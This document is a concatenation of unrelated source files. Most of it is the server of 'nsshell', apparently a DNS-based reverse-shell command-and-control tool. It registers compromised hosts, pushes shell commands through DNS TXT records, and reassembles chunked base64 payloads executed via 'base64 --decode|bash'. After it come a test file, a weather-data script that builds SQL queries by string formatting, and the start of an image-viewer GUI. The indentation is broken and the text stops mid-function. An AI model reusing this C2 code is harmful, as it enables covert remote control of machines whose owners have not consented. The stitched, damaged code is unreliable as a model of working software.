self.session.set_data(direct_sess_id, "direct", True)
self.session.set_data(direct_sess_id, "shell_type", shell_type)
self.session.set_data(sess_id, "direct", False)
cmd_runner = self.loader.get_connect(direct_sess_id, True, shell_type)
elif not self.session.get_data(sess_id, "host"):
            #Request the machine_id for this new session.
cmd = "eval 'whoami;hostname'"
cmd_runner = self.loader.get_runner(sess_id, cmd, direct, shell_type)
if not self.session.get_data(sess_id, "host"):
            #If we haven't seen this session before, then we need some kind of identification.
if len(name_parts) > 1:
data = query_name
data = "".join(name_parts[1:])
try:
                    #Look for a single-block message that contains two newline-separated elements
machine_id = base64.b64decode(data).strip()
machine_id = machine_id.split("\n")
except:
machine_id = False
if machine_id and len(machine_id) == 2:
new_host = machine_id[1]
new_user = machine_id[0]
if self.session.new_machine(sess_id, new_user, new_host):
message = "new Session: " + sess_id + " - " + new_user + "@"+ new_host +" - payload: " + self.session.get_data(sess_id, "payload")
print("\n"+message)
log(sess_id, new_host, new_user, message+"\n")
else:
print("\nkilled duplicate: " + sess_id + " - payload: " + self.session.get_data(sess_id, "payload") + " - restart nsshell if this was a mistake.")
#we have tried to exit this host but it reconnected.
self.session.send_exit(sess_id)
name_parts = []
else:
#Send commands
if query.type == dns.TXT:
chunk_cmd = self.session.get_data(sess_id, "chunk_cmd")
if not chunk_cmd:
cmd = self.session.get_motd(sess_id)
else:
cmd = False
if self.session.get_data(sess_id, "last_read") != 0 and self.session.clear_read(sess_id):
#end of read for a command.
self.session.indicator(sess_id)
self.session.set_data(sess_id, "currently_receiving", False)
if cmd and (cmd.lstrip().startswith("cd ") or cmd.lstrip().startswith("eval ") or cmd.lstrip().startswith("export ")):
#This command _is_ a true eval
if cmd.lstrip().startswith("eval "):
cmd = cmd[5:]
#pipes spawn a sub-shell which breaks cd, and 'cd' doesn't return anything anyway.
#eval the raw command
cmd_runner = cmd
self.session.indicator(sess_id)
elif cmd:
cmd_runner = self.loader.get_runner(sess_id, cmd, direct, shell_type)
if len(cmd_runner) > 255:
chunk_cmd = base64.b64encode(cmd)
self.session.set_data(sess_id, "chunk_cmd", chunk_cmd)
self.session.set_data(sess_id, "chunk_offset", 0)
cmd_runner = ""
self.send_chunks(sess_id, answers, query.name.name, direct, shell_type, page_size)
#Did we get data back from the client?
elif len(name_parts) > 1 and len(name_parts[1]) > 2 and name_parts[0][2:].isdigit():
sequence_number = int(name_parts[0][2:])
data = "".join(name_parts[1:])
self.session.add_buffer(sess_id, sequence_number, data)
#Only print stdout if the user is watching.
if self.session.current_session == sess_id:
std_data = self.session.read_stdout(sess_id)
sys.stdout.write(std_data)
if chunk_cmd:
#We still have data, send more pages
self.send_chunks(sess_id, answers, query.name.name, direct, shell_type, page_size)
elif cmd_runner:
if len(cmd_runner) >= 255:
#Should never happen unless there is a bug with the runner
print("cmd runner too large:"+str(len(cmd_runner))+">255")
return
#We have a new command
            send_command = dns.RRHeader(
                name=query.name.name,
                type=dns.TXT,
                payload=dns.Record_TXT(cmd_runner, ttl=0))
            answers.append(send_command)
elif not self.session.get_data(sess_id, "host"):
full_connect = self.loader.get_connect(sess_id, direct, shell_type)
if len(full_connect) > 255:
print('{0} connect payload too large.'.format(len(full_connect)))
else:
if len(full_connect) > 255:
#should never happen unless there is a bug with the connect back
print("connectback too large:"+str(len(full_connect))+">255")
return
#send packaged command to the client
connect_back_loader=dns.RRHeader(
name=query.name.name,
type=dns.TXT,
payload=dns.Record_TXT(full_connect))
#"{echo,'"
answers.append(connect_back_loader)
sys.stdout.flush()
return defer.succeed((answers, authority, additional))
#chunk a command, and execute it.
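    # Rough illustration of the scheme (added for clarity): the base64-encoded command
    # is sliced into ~251-byte pieces and delivered as TXT records that assign shell
    # variables, e.g.
    #   aa=<piece 1>;  ab=<piece 2>;  ...
    # followed by a merge record such as  Z=;Z=$Z$aa$ab...;  and finally a runner like
    #   echo $Z|base64 --decode|bash
    # once every chunk has been delivered.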
def send_chunks(self, sess_id, answers, query_name, direct, shell_type, page_size):
chunk_runner = ""
cut_len = 0
#4 chars of overhead aa=%data%;
bytes_per_chunk = 255 - 4
chunk_offset = self.session.get_data(sess_id, "chunk_offset")
chunk_cmd = self.session.get_data(sess_id, "chunk_cmd")
chunk_state = self.session.get_data(sess_id, "chunk_state")
cut = chunk_offset * bytes_per_chunk
if chunk_state == "+":
#All chunks sent, execute them.
#self.session.set_data(sess_id, "chunk_offset", 0)
#have we loaded all pages, now run them
full = ""
#Did we process the first page?
if chunk_offset <= 82:
#If this is the first page, then zero out the run key.
chunk_runner = "Z=;"
#List all variables we used
keys_used = chunk_offset % 82
for i in range(keys_used):
full += "$"+self.chunk_keys[i]
chunk_runner = chunk_runner + "Z=$Z" + full + ";"
if cut >= len(chunk_cmd):
chunk_state = "-"
else:
chunk_state = ""
#we have crunched down all vars, now execute the full payload
elif chunk_state == "-":
run_key = "$Z"
chunk_runner = self.loader.get_runner(sess_id, "echo "+run_key+"|base64 --decode|"+shell_type, direct, shell_type)
#all done, good job boys.
chunk_cmd = ""
chunk_state = ""
chunk_offset = 0
else:# we have data
while cut < len(chunk_cmd) and len(answers) <= page_size:
#We can only merge 82 variables with a 255 byte record.
                #TODO: improve merging by sending more data, and then merging all blocks down in one phase.
if chunk_offset > 0 and chunk_offset % 82 == 0:
chunk_offset -= 1
chunk_state = "+"
break
key = self.chunk_keys[chunk_offset]
chunk_offset += 1
#build a 255 byte chunk
cut_len = cut + bytes_per_chunk
new_chunk = key+"="+chunk_cmd[cut:cut_len]+";"
cut = cut_len
send_chunk = dns.RRHeader(
name=query_name,
type=dns.TXT,
payload=dns.Record_TXT(new_chunk, ttl=0))
answers.append(send_chunk)
#Check if we still have to send data
if cut >= len(chunk_cmd):
#All set, run the command.
chunk_state = "+"
if chunk_runner:
run_chunk = dns.RRHeader(
name=query_name,
type=dns.TXT,
payload=dns.Record_TXT(chunk_runner, ttl=0))
answers.append(run_chunk)
self.session.set_data(sess_id, "chunk_state", chunk_state)
self.session.set_data(sess_id, "chunk_offset", chunk_offset)
self.session.set_data(sess_id, "chunk_cmd", chunk_cmd)
#The data
class session_handler:
session_index = 0
current_session = False
    #q is a session created for testing, and hardcoded in the test files.
sessions = {}
def __init__(self, payload_count):
self.keyspace = map(''.join, itertools.product(string.ascii_letters + string.digits, repeat=2))
        #Payloads will use numbers 0..payload_count and sessions will use every other 2-char permutation.
for x in range(10, payload_count):
self.keyspace.remove(str(x))
random.shuffle(self.keyspace)
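        # e.g. (illustrative) with payload_count=12 the strings "10" and "11" are
        # removed here, leaving them free to identify payloads rather than sessions.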
def set_motd(self, sess_id, message):
self.sessions[sess_id]["stdin"].put(message)
def get_motd(self, sess_id):
ret = False
try:
ret = self.sessions[sess_id]["stdin"].get_nowait()
except:
pass
return ret
#give us a random unique id for a large number of hosts.
def generate_id(self):
id = self.keyspace[self.session_index]
self.session_index += 1
return id
def new(self, new_id = False):
while not new_id:
#we could have used this id by a resumed session
new_id = self.generate_id()
if new_id in self.sessions:
new_id = False
self.sessions[new_id] = {"user": "",
"host": "",
#"ip": "",# not sure how to get this....
"direct": None,
"last_req": datetime.datetime.now(),
"stdin": Queue.Queue(),
"stdout": Queue.Queue(),
"bufferd_read": {},
"last_read": 0,
"leftovers": "",
"shell_type":"bash",
"payload":"",
"currently_receiving":False,
"chunk_cmd":"",
"chunk_offset":0,
"chunk_state":"",
"page_size":14,#8.8.8.8 returns at most 14 txt records per query.
"exit": False
}
return new_id
def list_sessions(self):
return self.sessions.keys()
def check_timeout(self):
delete = []
for sess_id in self.sessions:
#have we gotten a request in the last min?
#Our shell went away :(
#Where did it go?
#Man, I need that fucking shell
#I know, know, its just gone... but it could still come back
if self.sessions[sess_id]['last_req'] <= (datetime.datetime.now() - datetime.timedelta(minutes=1)):
user = self.sessions[sess_id]["user"]
if not self.sessions[sess_id]["exit"] and user:
print("client timed out: " + sess_id + " - " + self.sessions[sess_id]["user"] + '@' \
+ self.sessions[sess_id]["host"])
delete.append(sess_id)
for sess_d in delete:
del self.sessions[sess_d]
def get_data(self, sess_id, key):
return self.sessions[sess_id][key]
def set_data(self, sess_id, key, val):
self.sessions[sess_id][key] = val
def get_session(self, chunk):
ret=False
if isinstance(chunk, list) and len(chunk) > 1:
chunk = chunk[0]
if len(chunk) > 1 and chunk[0]:
#first two char only.
chunk = chunk[0:2]
ret = False
for s in self.sessions:
if chunk == s:
ret = s
#Update the access time on this session.
self.sessions[ret]['last_req'] = datetime.datetime.now()
break
return ret
def put(self, sess_id, b64):
self.sessions[sess_id].append(b64)
def new_machine(self, sess_id, user, host):
ret = True
for sess in self.sessions:
if self.sessions[sess]["user"] == user and self.sessions[sess]["host"] == host and self.check_exit(sess):
#we must have popped this guy twice.
ret = False
break
#should we limit to just one session?
#right now we spawn a new session - more shells is better than not enough shells
self.set_data(sess_id, "user", user)
self.set_data(sess_id, "host", host)
return ret
def send_exit(self, sess_id):
if sess_id in self.sessions:
self.sessions[sess_id]["exit"] = True
#Should this session exit?
def check_exit(self, sess_id):
return sess_id in self.sessions and self.sessions[sess_id]["exit"]
#Check to see if we have all of the data from the client.
def clear_read(self, sess_id):
for i in range(0, self.sessions[sess_id]['last_read'] + 10):
if i in self.sessions[sess_id]["bufferd_read"]:
return False
self.sessions[sess_id]['last_read'] = 0
return True
def add_buffer(self, sess_id, sequence, data):
if self.sessions[sess_id]['exit']:
return
client_data = ""
if sequence == 0 and self.clear_read(sess_id):
self.sessions[sess_id]["currently_receiving"] = True
self.sessions[sess_id]["bufferd_read"][sequence] = data
i = self.sessions[sess_id]["last_read"]
while True:
if i in self.sessions[sess_id]["bufferd_read"]:
client_data += self.sessions[sess_id]["bufferd_read"][i]
del self.sessions[sess_id]["bufferd_read"][sequence]
i += 1
self.sessions[sess_id]["last_read"] = i
else:
break
#Do we have data?
if len(client_data):
client_data = self.sessions[sess_id]["leftovers"] + client_data
try:
#we need some multiple of 4 bytes in order for b64decode to work
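                # e.g. (illustrative) 10 buffered chars -> valid_count = 8: decode the
                # first 8 now and carry the trailing 2 over to the next request.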
valid_count = len(client_data)/4*4
decode_total = client_data[0:valid_count]
decode_total = base64.b64decode(decode_total)
#Somewhere between 0-3 bytes will remain
self.sessions[sess_id]["leftovers"] = client_data[valid_count:]
#we only want to print the current session
self.sessions[sess_id]['stdout'].put(decode_total)
log(sess_id, self.sessions[sess_id]["host"], self.sessions[sess_id]["user"], decode_total)
except:
#this should never happen
print("partial base64 decode error:")
print(len(decode_total))
print(decode_total)
#only print output from the current session
def read_stdout(self, sess_id):
ret = ''
try:
#break on empty
while True:
data = self.sessions[sess_id]['stdout'].get_nowait()
ret += data
except Queue.Empty:
pass
return ret
#print shell information to the user.
def indicator(self, sess_id):
if sess_id:
sys.stdout.write(sess_id + '-' + self.sessions[sess_id]["user"] + '@' + self.sessions[sess_id]["host"] + '>')
else:
sys.stdout.write('>')
class noResponseServer:
def gotResolverResponse(self, *args):
pass
#The UI
class Console(basic.LineReceiver):
from os import linesep as delimiter
current_session = None
current_name = ""
current_host = ""
def setSession(self, session):
self.session = session
def indicator(self):
if self.current_session:
self.transport.write(self.current_session+'-'+self.current_name+'@'+self.current_host+'>')
else:
self.transport.write('>')
def connectionMade(self):
print("ready")
self.indicator()
def lineReceived(self, line):
line = str(line).strip()
line_cmd = line.lower()
#Check for timeouts
self.session.check_timeout()
#the current shell may have timed out, sorry m8
if self.current_session and self.current_session not in self.session.sessions:
print(self.current_session + " went away :(")
self.current_session = False
# Ignore blank lines
if line:
lime_cmd_parts=line.split(" ")
if line_cmd.startswith("quit") or line_cmd.startswith("exit") or line_cmd.startswith("close"):
if len(lime_cmd_parts) < 2:
print("to remove: exit sess_id")
print("to exit the server: ctrl+c (clients will still be running)")
else:
self.do_exit(lime_cmd_parts[1])
self.indicator()
elif line_cmd == "clear":
self.do_clear()
self.indicator()
elif line_cmd == "help" or line_cmd == "?" or line_cmd == "'help'":
self.do_help()
self.indicator()
elif line_cmd.startswith("session") or line_cmd.startswith("open") or line_cmd.startswith("connect"):
if len(lime_cmd_parts) < 2:
self.do_sessions()
else:
#forgiving - will accept metasploit syntax
if lime_cmd_parts[1] == "-i":
lime_cmd_parts[1] = lime_cmd_parts[2]
self.change_session(lime_cmd_parts[1])
self.indicator()
elif self.current_session:
log(self.current_session, self.current_host, self.current_name, str(datetime.datetime.now())+">"+line+"\n")
self.session.set_motd(self.current_session, line)
else:
print("type 'help' to get a list of commands")
self.indicator()
sys.stdout.flush()
def do_help(self, command=None):
"""help [command]: List commands, or show help on the given command"""
if command:
self.sendLine(getattr(self, 'do_' + command).__doc__)
else:
commands = [cmd[3:] for cmd in dir(self) if cmd.startswith('do_')]
self.sendLine("valid commands: " + " ".join(commands))
def change_session(self, sess_id):
my_id = self.session.get_session(sess_id)
if my_id:
self.current_session = my_id
self.current_name = self.session.get_data(self.current_session, "user")
self.current_host = self.session.get_data(self.current_session, "host")
self.session.current_session = my_id
std_data = self.session.read_stdout(my_id)
sys.stdout.write(std_data)
print("changed to active session:"+sess_id)
else:
print("not an active session:"+sess_id)
def do_sessions(self):
printed = False
"""sessions: Interact with connected systems."""
for sess_id in self.session.list_sessions():
printed=True
exit_status = self.session.get_data(sess_id, 'exit')
user = self.session.get_data(sess_id, 'user')
if not exit_status and user:
host = self.session.get_data(sess_id, 'host')
direct = self.session.get_data(sess_id, 'direct')
last_req = self.session.get_data(sess_id, 'last_req')
direct = 'direct' if (direct) else 'UDP 53 filtered'
print(sess_id + " - "+ str(self.session.get_data(sess_id, 'last_req')) + " - "+user+"@" + host + " - " +\
self.session.get_data(sess_id, 'payload') + " - " + direct)
if not printed:
print("no active sessions")
def do_clear(self):
"""clear: Clears the console"""
os.system("clear")
def do_exit(self, sess_id):
"""exit: exit this session, "exit all" will exit all sessions"""
if sess_id.lower() == "all":
for sess_id in self.session.list_sessions():
self.session.send_exit(sess_id)
self.current_session = False
self.session.current_session = False
else:
self.session.send_exit(sess_id)
if self.current_session == sess_id:
self.current_session = False
self.session.current_session = False
class Logger(object):
log_files = {}
@staticmethod
def background_log(sess_id, host, user, data, retry = 3):
sess_id = re.sub(r'\W+', '', sess_id)
host = re.sub(r'\W+', '', host)
user = re.sub(r'\W+', '', user)
log_path = config.LOG_DIR+"/"+sess_id+"_"+host+"_"+user+".log"
try:
if log_path not in Logger.log_files:
Logger.log_files[log_path] = open(log_path, "a")
Logger.log_files[log_path].write(data)
Logger.log_files[log_path].flush()
except: # TODO make this more specific, eating all errors bad
#just to be safe, lets make sure we wrote it.
if retry >= 1:
return Logger.background_log(sess_id, host, user, data, retry - 1)
def log(sess_id, host, user, data):
reactor.callInThread(Logger.background_log, sess_id, host, user, data)
def main():
"""
Run the server.
"""
argparser = ArgumentParser(description='nsshell.py HOST IP\nnsshell.py localhost 127.0.0.1', formatter_class=RawTextHelpFormatter)
argparser.add_argument('hostname',
default=str(subprocess.check_output(['hostname','-f'])).strip(),
nargs='?',
help='hostname of the publicly facing server, for debugging=localhost',
type=str)
argparser.add_argument('ip',
default='',
nargs='?',
help='ip addr of publicly facing server',
type=str)
config_args = argparser.add_argument_group(title='Config Args')
config_args.add_argument('--logdir',
action='store',
default='',
dest='logdir',
help='set logging directory')
if len(sys.argv) <= 2:
argparser.print_help()
sys.exit(1)
args = vars(argparser.parse_args())
# check to see if logging has been disabled
if args['logdir'].lower() in config.CLI_NO:
config.LOG_DIR = None
elif args['logdir']:
config.LOG_DIR = os.path.realpath(args['logdir'])
if config.LOG_DIR and not os.path.exists(config.LOG_DIR):
os.makedirs(config.LOG_DIR)
hostname = args['hostname']
ip = args['ip']
if len(ip) > 15:
sys.stderr.write("Must be ipv4:"+args['ip'])
sys.exit(1)
print("Starting nsshell - DO NOT DISTRIBUTE")
print("using hostname: " + hostname)
print("using IP: " + ip)
if config.LOG_DIR:
print("logging to: " + config.LOG_DIR)
load = loader(hostname, ip)
payload_count = len(load.payloads)
#payload_count is used to prevent session IDs and payloads from sharing the same keys.
sessionhandler = session_handler(payload_count)
sr = ShellResolver(sessionhandler, ip, hostname, load)
console_handler = Console()
console_handler.setSession(sessionhandler)
    #The Twisted DNS server will throw a harmless exception when scanned by nmap.
#We are overriding gotResolverResponse with a lambda to avoid this exception:
#File "/usr/lib/python2.7/dist-packages/twisted/names/server.py", line 263, in gotResolverResponse
# def gotResolverResponse(self, (ans, auth, add), protocol, message, address):
#exceptions.TypeError: 'NoneType' object is not iterable
server.gotResolverResponse = lambda *x: False
factory = server.DNSServerFactory(
clients=[sr]
#We don't want to be an open resolver:
#, client.Resolver(resolv='/etc/resolv.conf')]
)
protocol = dns.DNSDatagramProtocol(controller=factory)
print("binding udp/53")
reactor.listenUDP(53, protocol)
print("binding tcp/53")
reactor.listenTCP(53, factory)
with open('payloads.txt','w') as f:
for payload in load.build_payloads():
f.write(payload+"\n")
print("wrote connect-back payloads to:payloads.txt")
stdio.StandardIO(console_handler)
reactor.run()
if __name__ == '__main__':
raise SystemExit(main())
| gpl-3.0 | -888,703,662,291,551,500 | 42.220109 | 174 | 0.536655 | false |
jaantollander/CrowdDynamics | crowddynamics/core/tests/test_quantities.py | 1 | 1070 | import numpy as np
import pytest
from hypothesis.control import assume
from hypothesis.core import given
from scipy.spatial.qhull import QhullError, Voronoi
from crowddynamics.core.quantities import density_voronoi_1
from crowddynamics.testing import reals
def all_unique(data: np.ndarray) -> bool:
"""Test that all data rows have unique data"""
ncols = data.shape[1]
dtype = data.dtype.descr * ncols
struct = data.view(dtype)
return len(np.unique(struct)) == len(data)
def does_not_raise_Qhull_error(points):
"""Test that Voronoi tesselation does raise errors"""
try:
vor = Voronoi(points)
return True
except QhullError:
return False
@pytest.mark.skip('Fixme')
# @given(points=reals(1, 10, shape=(3, 2)))
@given(points=reals(1, 10, shape=(10, 2)))
# @given(points=reals(1, 10, shape=(100, 2)))
def test_density_voronoi_1(points):
assume(does_not_raise_Qhull_error(points))
assume(all_unique(points))
cell_size = 0.1
density = density_voronoi_1(points, cell_size=cell_size)
assert True
| gpl-3.0 | -7,790,188,025,380,964,000 | 27.157895 | 60 | 0.696262 | false |
mivp/tessterrain | examples/geo_weather/fetch_weather_data.py | 1 | 3521 | #!/usr/bin/env python
import csv
import json
import requests
import numpy as np
import sqlite3
csv_filename = "testdata/vic_usgs/south_west_stations.csv"
db_filename = "testdata/vic_usgs/south_west_stations.db"
# open database
conn = sqlite3.connect(db_filename)
c = conn.cursor()
# Create stations table
c.execute('''CREATE TABLE IF NOT EXISTS stations
(id text, short text, name text, lon real, lat real, height real, json text, UNIQUE(id))''')
# Create observations table
c.execute('''CREATE TABLE IF NOT EXISTS observations
(id text, local_date_time text, local_date_time_full text,
apparent_t real, delta_t real, air_temp real, rain_trace text, rel_hum real, wind_dir text, wind_spd_kmh real,
UNIQUE(id, local_date_time_full))''')
# Create time point table
c.execute('''CREATE TABLE IF NOT EXISTS time
(id text, local_date_time_full text, UNIQUE(local_date_time_full))''')
# stations
with open(csv_filename, 'rb') as csvfile:
stations = csv.DictReader(csvfile)
for station in stations:
id = station["ID"]
short = station["Short"]
name = station["Name"]
lon = float(station["Lon"])
lat = float(station["Lat"])
height = float(station["Height"])
json = station["Json"]
# Insert a row of data into stations
query_str = "INSERT OR IGNORE INTO stations VALUES ('%s', '%s', '%s', %f, %f, %f, '%s')" % (id, short, name, lon, lat, height, json)
print query_str
c.execute( query_str )
# Update observations table
r = requests.get(json)
stationdata = r.json()
data = stationdata["observations"]["data"]
nrows = len(data)
for i in range(nrows):
apparent_t = data[i]['apparent_t']
if apparent_t is None:
apparent_t = 0
delta_t = data[i]['delta_t']
if delta_t is None:
delta_t = 0
air_temp = data[i]['air_temp']
if air_temp is None:
air_temp = 0
rain_trace = data[i]['rain_trace']
if rain_trace is None:
rain_trace = ''
rel_hum = data[i]['rel_hum']
if rel_hum is None:
rel_hum = 0
wind_spd_kmh = data[i]['wind_spd_kmh']
if wind_spd_kmh is None:
wind_spd_kmh = 0
query_str = "INSERT OR IGNORE INTO observations VALUES ('%s', '%s', '%s', %0.2f, %0.2f, %0.2f, '%s', %0.2f, '%s', %0.2f)" % \
(id, data[i]['local_date_time'], data[i]['local_date_time_full'], apparent_t, delta_t, \
air_temp, rain_trace, rel_hum, data[i]['wind_dir'], wind_spd_kmh)
print query_str
c.execute(query_str)
query_str = "INSERT OR IGNORE INTO time VALUES (%s, '%s')" % (id, data[i]['local_date_time_full'])
print query_str
c.execute(query_str)
# commit the change
conn.commit()
# close database
conn.close()
# TESTING: print out to check
"""
import pandas as pd

conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute("SELECT name FROM sqlite_master WHERE type='table';")
tables = c.fetchall()
print tables
for table_name in tables:
table_name = table_name[0]
table = pd.read_sql_query("SELECT * from %s" % table_name, conn)
#print table
table.to_csv('testdata/vic_usgs/south_west_stations_' + table_name + '.csv', index_label='index')
# close database
conn.close()
""" | gpl-3.0 | -7,483,555,041,241,263,000 | 31.311927 | 140 | 0.575689 | false |
eteq/ginga | ginga/qtw/GingaQt.py | 1 | 27414 | #
# GingaQt.py -- Qt display handler for the Ginga reference viewer.
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
# stdlib imports
import sys, os
import traceback
import platform
import time
# GUI imports
from ginga.qtw.QtHelp import QtGui, QtCore, QFont, \
QImage, QIcon, QPixmap, MenuBar
from ginga.qtw import Widgets
# Local application imports
from ginga import cmap, imap
from ginga.misc import Bunch
from ginga.canvas.types.layer import DrawingCanvas
from ginga.util.six.moves import map, zip
moduleHome = os.path.split(sys.modules[__name__].__file__)[0]
sys.path.insert(0, moduleHome)
childDir = os.path.join(moduleHome, 'plugins')
sys.path.insert(0, childDir)
from ginga.qtw import ColorBar, Readout, PluginManagerQt, \
QtHelp, QtMain, ImageViewCanvasQt
icon_path = os.path.abspath(os.path.join(moduleHome, '..', 'icons'))
rc_file = os.path.join(moduleHome, "qt_rc")
class GingaViewError(Exception):
pass
class GingaView(QtMain.QtMain):
def __init__(self, logger, ev_quit):
# call superclass constructors--sets self.app
QtMain.QtMain.__init__(self, logger=logger, ev_quit=ev_quit)
if os.path.exists(rc_file):
self.app.setStyleSheet(rc_file)
# defaults for height and width
#self.default_height = min(900, self.screen_ht - 100)
#self.default_width = min(1600, self.screen_wd)
self.w = Bunch.Bunch()
self.iconpath = icon_path
self._lastwsname = 'channels'
self.layout = None
self._lsize = None
self._rsize = None
def set_layout(self, layout):
self.layout = layout
def get_screen_dimensions(self):
return (self.screen_wd, self.screen_ht)
def build_toplevel(self):
self.font = self.getFont('fixedFont', 12)
self.font11 = self.getFont('fixedFont', 11)
self.font14 = self.getFont('fixedFont', 14)
self.font18 = self.getFont('fixedFont', 18)
self.w.tooltips = None
QtGui.QToolTip.setFont(self.font11)
self.ds = QtHelp.Desktop()
self.ds.make_desktop(self.layout, widgetDict=self.w)
# TEMP: FIX ME!
self.gpmon.ds = self.ds
for root in self.ds.toplevels:
# add delete/destroy callbacks
## root.connect(root, QtCore.SIGNAL('closeEvent()'),
## self.quit)
#root.setApp(self)
root.setWindowTitle("Ginga")
self.ds.add_callback('all-closed', self.quit)
self.w.root = root
self.w.fscreen = None
# Create main (center) FITS image pane
self.w.vbox = self.w['main'].layout()
self.w.vbox.setSpacing(0)
self.w.mnb = self.w['channels']
if isinstance(self.w.mnb, QtGui.QMdiArea):
self.w.mnb.subWindowActivated.connect(self.page_switch_mdi_cb)
self.w.mnb.set_mode('tabs')
else:
self.w.mnb.currentChanged.connect(self.page_switch_cb)
# readout
if self.settings.get('share_readout', True):
self.readout = self.build_readout()
self.add_callback('field-info', self.readout_cb, self.readout, None)
rw = self.readout.get_widget()
self.w.vbox.addWidget(rw, stretch=0)
# bottom buttons
plw = QtGui.QWidget()
hbox = QtGui.QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
hbox.setSpacing(2)
plw.setLayout(hbox)
cbox1 = QtHelp.ComboBox()
self.w.channel = cbox1
cbox1.setToolTip("Select a channel")
cbox1.activated.connect(self.channel_select_cb)
hbox.addWidget(cbox1, stretch=0)
opmenu = QtGui.QMenu()
self.w.operation = opmenu
btn = QtGui.QPushButton("Operation")
btn.clicked.connect(self.invoke_op_cb)
btn.setToolTip("Invoke operation")
self.w.opbtn = btn
hbox.addWidget(btn, stretch=0)
w = QtGui.QWidget()
self.w.optray = QtGui.QHBoxLayout()
self.w.optray.setContentsMargins(0, 0, 0, 0)
self.w.optray.setSpacing(2)
w.setLayout(self.w.optray)
hbox.addWidget(w, stretch=1, alignment=QtCore.Qt.AlignLeft)
self.w.vbox.addWidget(plw, stretch=0)
# Add colormap bar
cbar = self.build_colorbar()
self.w.vbox.addWidget(cbar, stretch=0)
menuholder = self.w['menu']
# NOTE: menubar is a ginga.Widgets wrapper
self.w.menubar = self.add_menus(menuholder)
self.add_dialogs()
statusholder = self.w['status']
self.add_statusbar(statusholder)
self.w.root.show()
def getPluginManager(self, logger, fitsview, ds, mm):
return PluginManagerQt.PluginManager(logger, fitsview, ds, mm)
def _name_mangle(self, name, pfx=''):
newname = []
for c in name.lower():
if not (c.isalpha() or c.isdigit() or (c == '_')):
newname.append('_')
else:
newname.append(c)
return pfx + ''.join(newname)
def add_menus(self, holder):
menubar = Widgets.Menubar()
self.menubar = menubar
menubar_w = menubar.get_widget()
# NOTE: Special hack for Mac OS X, otherwise the menus
# do not get added to the global OS X menu
macos_ver = platform.mac_ver()[0]
if len(macos_ver) > 0:
self.w['top'].layout().addWidget(menubar_w, stretch=0)
else:
holder.layout().addWidget(menubar_w, stretch=1)
# create a File pulldown menu, and add it to the menu bar
filemenu = menubar.add_name("File")
item = filemenu.add_name("Load Image")
item.add_callback('activated', lambda *args: self.gui_load_file())
item = filemenu.add_name("Remove Image")
item.add_callback("activated", lambda *args: self.remove_current_image())
filemenu.add_separator()
item = filemenu.add_name("Quit")
item.add_callback('activated', lambda *args: self.windowClose())
# create a Channel pulldown menu, and add it to the menu bar
chmenu = menubar.add_name("Channel")
item = chmenu.add_name("Add Channel")
item.add_callback('activated', lambda *args: self.gui_add_channel())
item = chmenu.add_name("Add Channels")
item.add_callback('activated', lambda *args: self.gui_add_channels())
item = chmenu.add_name("Delete Channel")
item.add_callback('activated', lambda *args: self.gui_delete_channel())
# create a Window pulldown menu, and add it to the menu bar
wsmenu = menubar.add_name("Workspace")
item = wsmenu.add_name("Add Workspace")
item.add_callback('activated', lambda *args: self.gui_add_ws())
item = wsmenu.add_name("Take Tab")
item.add_callback('activated',
lambda *args: self.ds.take_tab_cb(self.w.mnb,
args))
if isinstance(self.w.mnb, QtGui.QMdiArea):
item = wsmenu.add_name("Panes as Tabs")
item.add_callback(lambda *args: self.tabstoggle_cb())
item.get_widget().setCheckable(True)
is_tabs = (self.w.mnb.get_mode() == 'tabs')
item.get_widget().setChecked(is_tabs)
item = wsmenu.add_name("Tile Panes")
item.add_callback('activated', lambda *args: self.tile_panes_cb())
item = wsmenu.add_name("Cascade Panes")
item.add_callback(lambda *args: self.cascade_panes_cb())
# # create a Option pulldown menu, and add it to the menu bar
# optionmenu = menubar.add_name("Option")
# create a Plugins pulldown menu, and add it to the menu bar
plugmenu = menubar.add_name("Plugins")
self.w.menu_plug = plugmenu
# create a Help pulldown menu, and add it to the menu bar
helpmenu = menubar.add_name("Help")
item = helpmenu.add_name("About")
item.add_callback('activated', lambda *args: self.banner(raiseTab=True))
item = helpmenu.add_name("Documentation")
item.add_callback('activated', lambda *args: self.help())
return menubar
def add_dialogs(self):
filesel = QtGui.QFileDialog(self.w.root, directory=os.curdir)
filesel.setFileMode(QtGui.QFileDialog.ExistingFile)
filesel.setViewMode(QtGui.QFileDialog.Detail)
self.filesel = filesel
def add_plugin_menu(self, name):
# NOTE: self.w.menu_plug is a ginga.Widgets wrapper
item = self.w.menu_plug.add_name("Start %s" % (name))
item.add_callback('activated',
lambda *args: self.start_global_plugin(name))
def add_statusbar(self, holder):
self.w.status = QtGui.QStatusBar()
holder.layout().addWidget(self.w.status, stretch=1)
def fullscreen(self):
self.w.root.showFullScreen()
def normalsize(self):
self.w.root.showNormal()
def maximize(self):
self.w.root.showMaximized()
def toggle_fullscreen(self):
if not self.w.root.isFullScreen():
self.w.root.showFullScreen()
else:
self.w.root.showNormal()
def build_fullscreen(self):
w = self.w.fscreen
self.w.fscreen = None
if w is not None:
w.destroy()
return
# Get image from current focused channel
chinfo = self.get_channelInfo()
fitsimage = chinfo.fitsimage
settings = fitsimage.get_settings()
rgbmap = fitsimage.get_rgbmap()
root = QtHelp.TopLevel()
vbox = QtGui.QVBoxLayout()
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
root.setLayout(vbox)
fi = self.build_viewpane(settings, rgbmap=rgbmap)
iw = fi.get_widget()
vbox.addWidget(iw, stretch=1)
# Get image from current focused channel
image = fitsimage.get_image()
if image is None:
return
fi.set_image(image)
# Copy attributes of the frame
fitsimage.copy_attributes(fi,
[#'transforms',
#'cutlevels',
'rgbmap'])
root.showFullScreen()
self.w.fscreen = root
def add_operation(self, title):
opmenu = self.w.operation
item = QtGui.QAction(title, opmenu)
item.triggered.connect(lambda: self.start_operation_cb(title))
opmenu.addAction(item)
self.operations.append(title)
####################################################
# THESE METHODS ARE CALLED FROM OTHER MODULES & OBJECTS
####################################################
def make_button(self, name, wtyp, icon=None, tooltip=None):
picon = None
if icon:
iconfile = os.path.join(self.iconpath, '%s.png' % icon)
try:
image = QImage(iconfile)
pixmap = QPixmap.fromImage(image)
picon = QIcon(pixmap)
qsize = QtCore.QSize(24, 24)
except Exception as e:
self.logger.error("Error loading icon '%s': %s" % (
iconfile, str(e)))
if wtyp == 'button':
